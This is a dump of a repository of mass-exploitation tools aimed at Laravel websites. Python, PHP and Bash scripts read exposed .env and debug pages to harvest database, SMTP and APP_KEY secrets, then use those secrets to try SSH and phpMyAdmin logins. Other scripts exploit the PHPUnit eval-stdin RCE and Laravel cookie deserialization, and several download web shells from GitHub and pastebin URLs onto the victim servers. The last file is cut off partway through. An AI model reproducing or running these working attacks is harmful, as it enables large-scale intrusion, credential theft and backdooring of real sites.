├── README.md ├── laravel-crackssh.py ├── laravel-debugbar.py ├── laravel-debugcheck.sh ├── laravel-phpmyadmin.py ├── laravel-phpunit.py ├── laravel-rce-mass.php ├── laravel-rce.php ├── laravel-sitecheck.sh ├── laravel-sitechecker.php ├── laravel-sitechecker.py ├── laravel-smtp-ssh-cpanel-v2.py ├── laravel-smtp-ssh-cpanel.py └── parallel.md /README.md: -------------------------------------------------------------------------------- 1 | # LARAPLER - Laravel Random Exploit 2 | - Requirements : Python2, Python3, PHP-cli, PHP-curl, Bash, Parallel
3 | - How to Install Parallel check Here
4 | - If you got error : python error no module named xxx ( just run ```pip install modulename``` ) 5 |

Another Exploit

6 | - Laravel Debug RCE : Here
7 | - Laravel Exploit Here
8 | - LaCrot Here
9 | - Laravel Checker (exe) Here
10 | - Laravel Scanner (exe) Here / Mirror
11 | - Laravel Scanner (bash) Here
12 | - CannabisLaravelEnv Here
13 |

Thanks for the all Tools Creator | Copyright by the all Tools Creator

14 | -------------------------------------------------------------------------------- /laravel-crackssh.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import paramiko 3 | import re, sys 4 | from concurrent.futures import ThreadPoolExecutor 5 | 6 | def bann(): 7 | x = """ 8 | [+] SSH Cracker [+] 9 | [-] Cracker From Laravel Config [-]\n 10 | """ 11 | print(x) 12 | 13 | class Oke: 14 | def __init__(self, url, resp): 15 | self.url = url 16 | self.resp = resp 17 | self.ip = self.url.split('/')[2] 18 | self.port = 22 19 | 20 | def getup(self): 21 | try: 22 | if 'DB_USERNAME=' in self.resp: 23 | u = re.findall('\nDB_USERNAME=(.*?)\n', self.resp)[0] 24 | p = re.findall('\nDB_PASSWORD=(.*?)\n', self.resp)[0] 25 | elif 'DB_USERNAME' in self.resp: 26 | u = re.findall('DB_USERNAME<\/td>\s+(.*?)<\/span>', self.resp)[0] 27 | p = re.findall('DB_PASSWORD<\/td>\s+(.*?)<\/span>', self.resp)[0] 28 | else: 29 | u = 'root' 30 | p = 'password123' 31 | except: 32 | u = 'root' 33 | p = 'password123' 34 | finally: 35 | return u, p 36 | 37 | def connect(self): 38 | try: 39 | user, passwd = self.getup() 40 | ssh = paramiko.SSHClient() 41 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 42 | ssh.connect(self.ip, self.port, user, passwd) 43 | tes = ssh.exec_command('ls') 44 | saved = '{}|{}|{}|{}'.format(self.ip, str(self.port), user, passwd) 45 | if tes: 46 | print('[+] Success login > {} [+]'.format(saved)) 47 | svw = open('sshlog.txt', 'a') 48 | svw.write(saved+'\n') 49 | svw.close() 50 | except Exception as e: 51 | print(str(e)) 52 | 53 | def main(url): 54 | resp = False 55 | vuln = url+'/.env' 56 | try: 57 | req = requests.get(vuln, timeout=14).text 58 | if 'DB_USERNAME' in req: 59 | resp = req 60 | else: 61 | req = requests.post(url, data={1: 1}, timeout=7).text 62 | if 'APP_KEY' in req: 63 | resp = req 64 | except Exception: 65 | print('[*] Cant Connect To Sites > {} [*]'.format(url)) 66 | if resp: 67 | iz = Oke(url, resp) 68 | iz.connect() 69 | else: 70 | print('[-] Not Laravel > {} [-]'.format(url)) 71 | 72 | 73 | if __name__ == '__main__': 74 | if len(sys.argv) != 2: 75 | print('Usage : python3 {} yourlist.txt'.format(sys.argv[0])) 76 | else: 77 | bann() 78 | target = open(sys.argv[1], 'r').read().splitlines() 79 | if '://' not in target[0] or '://' not in target[1]: 80 | target = ['http://'+xx for xx in target] 81 | else: 82 | pass 83 | with ThreadPoolExecutor(max_workers=10) as exc: 84 | exc.map(main, target) 85 | -------------------------------------------------------------------------------- /laravel-debugbar.py: -------------------------------------------------------------------------------- 1 | import os, requests, time 2 | from multiprocessing.dummy import Pool as ThreadPool 3 | from multiprocessing import Pool 4 | import threading 5 | import sys 6 | from colorama import Fore, Style 7 | 8 | 9 | def screen_clear(): 10 | _ = os.system('cls') 11 | 12 | 13 | bl = Fore.BLUE 14 | wh = Fore.WHITE 15 | gr = Fore.GREEN 16 | red = Fore.RED 17 | res = Style.RESET_ALL 18 | yl = Fore.YELLOW 19 | 20 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0'} 21 | 22 | def debugbar (star): 23 | if "://" in star: 24 | star = star 25 | else: 26 | star = "http://" + star 27 | star = star.replace('\n', '').replace('\r', '') 28 | url = star + "/" 29 | check = requests.get(url, headers=headers, timeout=3) 30 | resp = check.text 31 | try: 32 | if "PhpDebugBar.DebugBar" in resp: 33 | print(f"Debugbar {gr}OK{res} => {star}\n") 34 | mrigel = open("found.txt", "a") 35 | mrigel.write(f'{star}/_debugbar/open?method=POST&max=1000&offset=0\n') 36 | else: 37 | print(f"{red}Not Found{res} Debugbar => {star}\n") 38 | except: 39 | pass 40 | 41 | 42 | def filter(star): 43 | try: 44 | debugbar(star) 45 | except: 46 | pass 47 | 48 | 49 | def main(): 50 | print(f'''{gr}[ DEBUDBAR CHECKER ] | [ BY XNXXVIDOES ]''') 51 | list = input(f"{gr}Give Me Your List.txt/{red}XNXXVIDOES> {gr}${res} ") 52 | star = open(list, 'r').readlines() 53 | try: 54 | ThreadPool = Pool(50) 55 | ThreadPool.map(filter, star) 56 | ThreadPool.close() 57 | ThreadPool.join() 58 | except: 59 | pass 60 | 61 | if __name__ == '__main__': 62 | screen_clear() 63 | main() 64 | -------------------------------------------------------------------------------- /laravel-debugcheck.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Mass Laravel Debug Checker 3 | # Created By Im-Hanzou 4 | # Using GNU Parallel 5 | # Usage: bash file.sh list.txt thread 6 | 7 | yellow='\033[0;33m' 8 | cat << "EOF" 9 | _ _ 10 | | | __ _ _ _ __ _ __ __ ___ | | 11 | | |__ / _` || '_|/ _` |\ V // -_)| | 12 | |____|\__,_||_| \__,_| \_/ \___||_| 13 | 14 | EOF 15 | printf "${yellow}Mass Laravel Debug Checker\nGithub : im-hanzou\nUsage: bash file.sh list.txt thread\nExample: bash laravel-debugcheck.sh list.txt 50\n\n\n" 16 | 17 | exploit(){ 18 | classic='\033[0m' 19 | red='\e[41m' 20 | green='\e[42m' 21 | target=$1 22 | thread=$2 23 | 24 | if [[ $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ 'APP_KEY' || $(curl --silent --connect-timeout 10 --max-time 10 --insecure $target -d '[]') =~ 'APP_KEY' ]]; 25 | then 26 | printf "${green}[ Vuln ]${classic} => [ $target | Laravel Debug ] \n"; 27 | printf "$target\n" >> vuln.txt 28 | else 29 | printf "${red}[ Not Vuln ]${classic} => $target \n"; 30 | printf "$target\n" >> bad.txt 31 | fi 32 | } 33 | 34 | export --no-notice -f exploit 35 | parallel -j $2 exploit :::: $1 36 | 37 | printf "\033[0;36mCheck Vuln : vuln.txt\n"; 38 | printf "\033[0;36mBad Site : bad.txt\n"; 39 | -------------------------------------------------------------------------------- /laravel-phpmyadmin.py: -------------------------------------------------------------------------------- 1 | #just for fun 2 | import requests as p 3 | import re 4 | from threading import Thread 5 | import os 6 | 7 | pala = {'User-Agent': 'Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko; googleweblight) Chrome/38.0.1025.166 Mobile Safari/535.19'} 8 | 9 | #banner 10 | def ban(): 11 | if os.name == 'nt': os.system('cls') 12 | else: os.system('clear') 13 | xxx = """ 14 | [+] Mass Phpmyadmin Login Scanner [+] 15 | [+] From env configuration [+] 16 | [+] Created By FaizGanz [+]\n 17 | """ 18 | print(xxx) 19 | 20 | #CekLogin 21 | def login(url, usr, pwd): 22 | urllog = url+'/phpmyadmin/' 23 | try: 24 | reqToken = p.get(urllog, headers=pala).text 25 | token = re.findall('name="token" value="(.*?)"', reqToken)[0] 26 | except: 27 | token = '2295ef2ef3886e2a25cb942a9c104bf3' 28 | try: 29 | dataLog = { 30 | 'pma_username': usr, 31 | 'pma_password': pwd, 32 | 'server': '1', 33 | 'target': 'index.php', 34 | 'token': token 35 | } 36 | cekLog = p.post(urllog, data=dataLog, headers=pala) 37 | if 'Log out' in cekLog.text: 38 | print('[+] Success Login {} > {} > {} [+]'.format(url, usr, pwd)) 39 | svwork = open('successlogin.txt', 'a') 40 | svwork.write(urllog+'|'+usr+'|'+pwd+'\n') 41 | svwork.close() 42 | else: 43 | print('[-] Cant Login {} > {} > {} [-]'.format(url, usr, pwd)) 44 | svwork = open('cantlogin.txt', 'a') 45 | svwork.write(urllog+'|'+usr+'|'+pwd+'\n') 46 | svwork.close() 47 | except Exception: 48 | print('[*] Cant Access sites > {} [*]'.format(url)) 49 | 50 | #Find User/Pass 51 | def getup(url, text): 52 | try: 53 | if 'DB_USERNAME=' in text: 54 | user = re.findall('\nDB_USERNAME=(.*?)\n', text)[0] 55 | passwd = re.findall('\nDB_PASSWORD=(.*?)\n', text)[0] 56 | elif 'DB_USERNAME' in text: 57 | user = re.findall('DB_USERNAME<\/td>\s+(.*?)<\/span>', text)[0] 58 | passwd = re.findall('DB_PASSWORD<\/td>\s+(.*?)<\/span>', text)[0] 59 | else: 60 | print('[-] Cant Get Username/Password [-]') 61 | except: 62 | print('[*] Something wrong [*]') 63 | finally: 64 | login(url, user, passwd) 65 | 66 | #cek url 67 | def cek(url): 68 | purl = url+'/phpmyadmin/' 69 | logurl = False 70 | resp = False 71 | try: 72 | Cekphpmyadmin = p.get(purl, headers=pala, timeout=14) 73 | if 'pma_username' in Cekphpmyadmin.text: 74 | logurl = url 75 | else: 76 | logurl = False 77 | except Exception: 78 | print('[*] Cant Acces sites > {} [*]'.format(url)) 79 | try: 80 | envcek = p.get(url+'/.env', headers=pala, timeout=14).text 81 | if 'DB_PASSWORD=' in envcek: 82 | resp = envcek 83 | else: 84 | debugcek = p.post(url, data={1: 1}, headers=pala, timeout=7).text 85 | if 'DB_PASSWORD' in debugcek: 86 | resp = debugcek 87 | if logurl and resp: 88 | getup(logurl, resp) 89 | elif not logurl and resp: 90 | print('[-] Cant get phpmyadmin login > {} [-]'.format(url)) 91 | except: 92 | print('[*] Cant Access sites > {} [*]'.format(url)) 93 | 94 | 95 | if __name__ == '__main__': 96 | ban() 97 | urlt = open(input('[+] Url List ~# '), 'r').read().split('\n') 98 | for tar in urlt: 99 | if '://' in tar: pass 100 | else: tar = 'http://'+tar 101 | t = Thread(target=cek, args=(tar,)) 102 | t.start() 103 | -------------------------------------------------------------------------------- /laravel-phpunit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | banner = """ 4 | RpQ#AdM 5 | EQ#d@F Xe Q 6 | MgKG eeeXX eW 7 | BNKGXeeX eW BEpqNg#mbAAAAbm#WQpB 8 | RNDUeeX XFDPU eeeeeeeeeeeeeeeee U@ANB 9 | MAFeeX XeU@dKKKdD@GU XeXX XXeeUW 10 | qDXeX XUN RBMNmK@F UeA 11 | M8Xe XFp M XM 12 | RKXe XM R be e# 13 | qFe eb p Xe# 14 | #XX XFR BGX eFQ 15 | be eb EPX e AB 16 | me XXXXXXXX p NUX eXDM 17 | NX XXeeeeXX UFGPPGG @ pdXXXee dM R R 18 | BFX X G@dbgNqpEBR RBE RQDXee F8mE EdGE Rdp 19 | beXeXX XFp pgD TXPAWMR Bb XeA dFR 20 | BXXPbqdX XM R pgDFXXPbQB pbUeX X@ gTm 21 | qbM 8X XFWKPUDR pgDUX PbQB BWD eX X8 geFB 22 | me eeX Tb pWdFeXPbQB BpQm8Uee eb beXQ 23 | RGX eD BNKP Te8WB BqgA8GU eeeX XM PXem 24 | BU em p#8UeXeXKp Mm8UXeeXXX eD ge em 25 | De eG pm@ eXX XPM EmPXeXX M N eW 26 | BKUeeeeeXdEN8 eX e8R RbUeX U em BKXX XUB 27 | BQgmmNpWPeX XFB R8eXXXeeeeeeeeeXX e@R QFe XeW 28 | p@eX eK QTXUPDAb#ggg#bK8G ee XUp gXX XUN 29 | R QXe XK BgqB REqAU X XN Ne XPB 30 | RFX Ue N RRRRRRR RND eXG eF#R FX p 31 | E XK#GeUKNB RpgD TTUKq MKUTFK E 32 | E eXXX XW pm@UUGDbgNqqqQW#K@UeTeGKNB BgFe eD 33 | RGe8qQGeX eb RMWA8PGFU UFPdmQp R R 8X ePp 34 | qQ RmUeX e@q RBBR MgM EU XeUKp 35 | BbUeX XXDQ BQKGDM RFX XeUbE 36 | B#PXeX XXGKNpR BpQ#KPXe@Q #TXeUbB 37 | qKFXeX XeX FP8ddKdD@PF eTT KM #FmB 38 | RQAPUXeeeeeeeeeeeeeeXFdNR 39 | EQ#A8PGFFFFG@DbWMR 40 | RBBBRR 41 | 42 | ./Xi4u7 - idiot people 43 | """ 44 | import requests, re, sys, threading 45 | from time import sleep 46 | from urlparse import urlparse 47 | requests.packages.urllib3.disable_warnings() 48 | import threading, time, random 49 | from Queue import Queue 50 | from threading import * 51 | screenlock = Semaphore(value=1) 52 | 53 | vuln = 0 54 | bad = 0 55 | shel = 0 56 | smtp = 0 57 | 58 | def get_smtp(url): 59 | global smtp 60 | fin = url.replace("/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/.env") 61 | try: 62 | spawn = requests.get(fin, timeout=15, verify=False).text 63 | if "MAIL_HOST" in spawn and "MAIL_USERNAME" in spawn: 64 | host = re.findall("\nMAIL_HOST=(.*?)\n", spawn)[0] 65 | port = re.findall("\nMAIL_PORT=(.*?)\n", spawn)[0] 66 | user = re.findall("\nMAIL_USERNAME=(.*?)\n", spawn)[0] 67 | pasw = re.findall("\nMAIL_PASSWORD=(.*?)\n", spawn)[0] 68 | if user == "null" or pasw == "null" or user == "" or pasw == "": 69 | pass 70 | if "mailtrap" in user: 71 | pass 72 | else: 73 | screenlock.acquire() 74 | print("\033[44m -- SMTP -- \033[0m "+fin) 75 | smtp = smtp + 1 76 | file = open("smtp.txt","a") 77 | geturl = fin.replace(".env","") 78 | pack = geturl+"|"+host+"|"+port+"|"+user+"|"+pasw 79 | file.write(pack+"\n") 80 | file.close() 81 | screenlock.release() 82 | except KeyboardInterrupt: 83 | print("Closed") 84 | exit() 85 | except: 86 | pass 87 | 88 | def exploit(url): 89 | get_smtp(url) 90 | global vuln 91 | global bad 92 | global shel 93 | try: 94 | data = "" 95 | text = requests.get(url, data=data, timeout=15, verify=False) 96 | if "phpinfo" in text.text: 97 | screenlock.acquire() 98 | print("\033[42;1m -- VULN -- \033[0m "+url) 99 | screenlock.release() 100 | vuln = vuln + 1 101 | wre = open("vulnerable.txt", "a") 102 | wre.write(url+"\n") 103 | wre.close() 104 | data2 = "'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0plbmRlcmFsOTIvc2hpbi9tYXN0ZXIvc2hpbi5waHAiLCJhcy5waHAiKSkgewoJZWNobyAiU3Vrc2VzIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8+')); ?>" 105 | spawn = requests.get(url, data=data2, timeout=15, verify=False) 106 | if "Sukses" in spawn.text: 107 | screenlock.acquire() 108 | print(" \033[42;1m | \033[0m Shell Spawned") 109 | screenlock.release() 110 | shel = shel + 1 111 | wrs = open("shells.txt", "a") 112 | pathshell = url.replace("eval-stdin.php","as.php") 113 | wrs.write(pathshell+"\n") 114 | wrs.close() 115 | else: 116 | screenlock.acquire() 117 | print(" \033[41;1m | \033[0m Fail Spawn Shell") 118 | screenlock.release() 119 | else: 120 | screenlock.acquire() 121 | print("\033[41;1m -- BAAD -- \033[0m "+url) 122 | screenlock.release() 123 | bad = bad + 1 124 | except KeyboardInterrupt: 125 | print("Closed") 126 | exit() 127 | except Exception as err: 128 | screenlock.acquire() 129 | print("\033[43;1m -- ERRN -- \033[0m "+url) 130 | screenlock.release() 131 | bad = bad + 1 132 | try: 133 | list = sys.argv[1] 134 | except: 135 | print "\033[31;1m"+banner+"\033[0m" 136 | print("\n\n# python2.7 l-evil.py list.txt") 137 | exit() 138 | asu = open(list).read().splitlines() 139 | jobs = Queue() 140 | def do_stuff(q): 141 | while not q.empty(): 142 | i = q.get() 143 | exp = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" 144 | if i.startswith("http"): 145 | url = i+exp 146 | exploit(url) 147 | else: 148 | url = "http://"+i+exp 149 | exploit(url) 150 | q.task_done() 151 | 152 | for trgt in asu: 153 | jobs.put(trgt) 154 | 155 | for i in range(30): # Default 10 Thread Ganti Aja Kalau Mau 156 | worker = threading.Thread(target=do_stuff, args=(jobs,)) 157 | worker.start() 158 | jobs.join() 159 | print("\033[44mSMTP : \033[0m "+str(smtp)) 160 | print("\033[42;1mSpawned Shell : \033[0m "+str(shel)) 161 | print("\033[43;1mExploited : \033[0m "+str(vuln)) 162 | print("\033[41;1mNot Vulnerable : \033[0m "+str(bad)) 163 | -------------------------------------------------------------------------------- /laravel-rce-mass.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | "; 46 | switch ($method) 47 | { 48 | case 1: 49 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 50 | break; 51 | case 2: 52 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' . "\x00" . '*' . "\x00" . 'listeners";a:1:{s:' . strlen($command) . ':"' . $command . '";a:1:{i:0;s:' . strlen($func) . ':"' . $func . '";}}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 53 | break; 54 | case 3: 55 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' . "\x00" . '*' . "\x00" . 'app";s:' . strlen($command) . ':"' . $command . '";s:17:"' . "\x00" . '*' . "\x00" . 'defaultChannel";s:1:"x";s:17:"' . "\x00" . '*' . "\x00" . 'customCreators";a:1:{s:1:"x";s:' .strlen($func) . ':"' . $func . '";}}}'; 56 | break; 57 | case 4: 58 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 59 | break; 60 | case 5: 61 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:'. strlen($p) . ':"' . $p . '";}}}'; 62 | break; 63 | case 6: 64 | $payload = 'O:29:"Illuminate\Support\MessageBag":2:{s:11:"' . "\x00" . '*' . "\x00" . 'messages";a:0:{}s:9:"' . "\x00" . '*' . "\x00" . 'format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:' . strlen($p) . ':"' . $p . '";}}}}'; 65 | break; 66 | } 67 | return base64_encode($payload); 68 | } 69 | } 70 | 71 | class Requester 72 | { 73 | 74 | public function Requests($url, $postdata = null, $headers = null, $follow = true) 75 | { 76 | $ch = curl_init(); 77 | curl_setopt($ch, CURLOPT_URL, $url); 78 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 79 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 80 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 81 | curl_setopt ($ch, CURLOPT_TIMEOUT, 15); 82 | curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 15); 83 | curl_setopt($ch, CURLOPT_HEADER, 1); 84 | if (!empty($headers) && $headers != null) 85 | { 86 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 87 | } 88 | if (!empty($postdata) && $postdata != null) 89 | { 90 | curl_setopt($ch, CURLOPT_POST, 1); 91 | curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); 92 | } 93 | if ($follow) 94 | { 95 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 96 | } 97 | $data = curl_exec($ch); 98 | $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 99 | $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); 100 | $head = substr($data, 0, $header_size); 101 | $body = substr($data, $header_size); 102 | return json_decode(json_encode(array( 103 | 'status_code' => $status_code, 104 | 'headers' => $this->HeadersToArray($head) , 105 | 'body' => $body 106 | ))); 107 | } 108 | public function HeadersToArray($str) 109 | { 110 | $str = explode("\r\n", $str); 111 | $str = array_splice($str, 0, count($str) - 1); 112 | $output = []; 113 | foreach ($str as $item) 114 | { 115 | if ($item === '' || empty($item)) continue; 116 | $index = stripos($item, ": "); 117 | $key = substr($item, 0, $index); 118 | $key = strtolower(str_replace('-', '_', $key)); 119 | $value = substr($item, $index + 2); 120 | if (@$output[$key]) 121 | { 122 | if (strtolower($key) === 'set_cookie') 123 | { 124 | $output[$key] = $output[$key] . "; " . $value; 125 | } 126 | else 127 | { 128 | $output[$key] = $output[$key]; 129 | } 130 | } 131 | else 132 | { 133 | $output[$key] = $value; 134 | } 135 | } 136 | return $output; 137 | } 138 | } 139 | 140 | class Exploit extends Requester 141 | { 142 | public $url; 143 | public $vuln; 144 | public $app_key; 145 | public $smtp; 146 | public function __construct($url) 147 | { 148 | $this->url = $url; 149 | $this->vuln = null; 150 | $this->app_key = null; 151 | $this->smtp = []; 152 | } 153 | public function getAppKeyEnv() 154 | { 155 | $req = parent::Requests($this->url . "/.env", null, null, $follow = false); 156 | if (preg_match('/APP_KEY/', $req->body)) 157 | { 158 | $loh = preg_replace('/\n/', '##', $req->body); 159 | preg_match_all('/APP_KEY=(.*?)##/', $loh, $matches, PREG_SET_ORDER, 0); 160 | $this->app_key = $matches[0][1]; 161 | preg_match_all('/MAIL_HOST=(.*?)##/', $loh, $mh, PREG_SET_ORDER, 0); 162 | preg_match_all('/MAIL_PORT=(.*?)##/', $loh, $mp, PREG_SET_ORDER, 0); 163 | preg_match_all('/MAIL_USERNAME=(.*?)##/', $loh, $mu, PREG_SET_ORDER, 0); 164 | preg_match_all('/MAIL_PASSWORD=(.*?)##/', $loh, $mw, PREG_SET_ORDER, 0); 165 | $this->smtp['HOST'] = ($mh[0][1]) ? $mh[0][1] : ''; 166 | $this->smtp['PORT'] = ($mp[0][1]) ? $mp[0][1] : ''; 167 | $this->smtp['USER'] = ($mu[0][1]) ? $mu[0][1] : ''; 168 | $this->smtp['PASS'] = ($mw[0][1]) ? $mw[0][1] : ''; 169 | } 170 | } 171 | public function getAppKey() 172 | { 173 | $req = parent::Requests($this->url, 'a=a', null, false); 174 | if (preg_match('/APP_KEY<\/td>/', $req->body)) 175 | { 176 | preg_match_all('/APP_KEY<\/td>\s+(.*?)<\/span>/', $req->body, $matches, PREG_SET_ORDER, 0); 177 | preg_match_all('/MAIL_HOST<\/td>\s+(.*?)<\/span>/', $req->body, $mh, PREG_SET_ORDER, 0); 178 | preg_match_all('/MAIL_PORT<\/td>\s+(.*?)<\/span>/', $req->body, $mp, PREG_SET_ORDER, 0); 179 | preg_match_all('/MAIL_USERNAME<\/td>\s+(.*?)<\/span>/', $req->body, $mu, PREG_SET_ORDER, 0); 180 | preg_match_all('/MAIL_PASSWORD<\/td>\s+(.*?)<\/span>/', $req->body, $mw, PREG_SET_ORDER, 0); 181 | $this->app_key = ($matches[0][1]) ? $matches[0][1] : null; 182 | $this->smtp['HOST'] = ($mh[0][1]) ? $mh[0][1] : ''; 183 | $this->smtp['PORT'] = ($mp[0][1]) ? $mp[0][1] : ''; 184 | $this->smtp['USER'] = ($mu[0][1]) ? $mu[0][1] : ''; 185 | $this->smtp['PASS'] = ($mw[0][1]) ? $mw[0][1] : ''; 186 | } 187 | else 188 | { 189 | $this->getAppKeyEnv($this->url); 190 | } 191 | } 192 | } 193 | 194 | parse_str(implode("&", array_slice($argv, 1)), $_GET); 195 | if (!$_GET['list']) return 'Usage: php ' . $argv[0] . ' list=list.txt'; 196 | $urls = $_GET['list']; 197 | $read = array_unique(explode("\n", str_replace("\r", "", file_get_contents($urls)))); 198 | 199 | foreach($read as $cok) { 200 | if (empty($cok) || $cok == '') continue; 201 | $req = new Requester(); 202 | $wibu = new Exploit($cok); 203 | $func = new Func_(); 204 | $wibu->getAppKey(); 205 | if (!empty($wibu->app_key) || $wibu->app_key != null) { 206 | $app = str_replace('base64:', '', $wibu->app_key); 207 | $payload = base64_encode('_ALL_WE_KNOW_'); 208 | $payload = $func->GeneratePayload("echo base64_decode('{$payload}');", 'system', 5); 209 | $serialize = $func->Serialize($app, $payload); 210 | $header = array( 211 | 'Cookie: XSRF-TOKEN=' . $serialize 212 | ); 213 | $bre = $req->Requests($cok, null, $header, false); 214 | if ($wibu->smtp['HOST'] != '' || !empty($wibu->smtp['HOST'])) { 215 | $data = "{$wibu->smtp['HOST']}|{$wibu->smtp['PORT']}|{$wibu->smtp['USER']}|{$wibu->smtp['PASS']}"; 216 | Save('SMTP.txt', $data); 217 | } 218 | if (preg_match('/_ALL_WE_KNOW_/', $bre->body)) { 219 | echo $cok . " ===> "; 220 | $payload = $func->GeneratePayload("echo system('curl https://pastebin.com/raw/8FHzfDCu -k -o '.public_path().'/c.php'); echo 'Rintod';", 'system', 5); 221 | $serialize = $func->Serialize($app, $payload); 222 | $header = array( 223 | 'Cookie: XSRF-TOKEN=' . $serialize 224 | ); 225 | $bro = $req->Requests($cok, null, $header, false); 226 | if (preg_match('/Rintod/', $bro->body)) { 227 | $njir = $req->Requests($cok . "/c.php", null, null, false); 228 | if (preg_match('/azzatssins/', $njir->body)) { 229 | echo 'SHELL OK ===> ' . $cok . '/c.php?0=ls' . PHP_EOL; 230 | Save('SHELL.txt', $cok . '/c.php?0=ls'); 231 | } else { 232 | echo 'SHELL FAIL! But RCE OK! Maybe Permission Denied For Uploading Shell!!!' . PHP_EOL; 233 | Save('MANUAL.txt', $cok); 234 | } 235 | } else { 236 | echo 'Failed Upload Shell! But RCE OK!' . PHP_EOL; 237 | Save('MANUAL.txt', $cok); 238 | } 239 | } else { 240 | echo $cok . " ===> NOT VULN" . PHP_EOL; 241 | } 242 | } else { 243 | echo $cok . " ===> NO APP_KEY!!!!" . PHP_EOL; 244 | } 245 | } 246 | -------------------------------------------------------------------------------- /laravel-rce.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env php 2 | "; 40 | switch ($method) 41 | { 42 | case 1: 43 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}'; 44 | break; 45 | case 2: 46 | $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 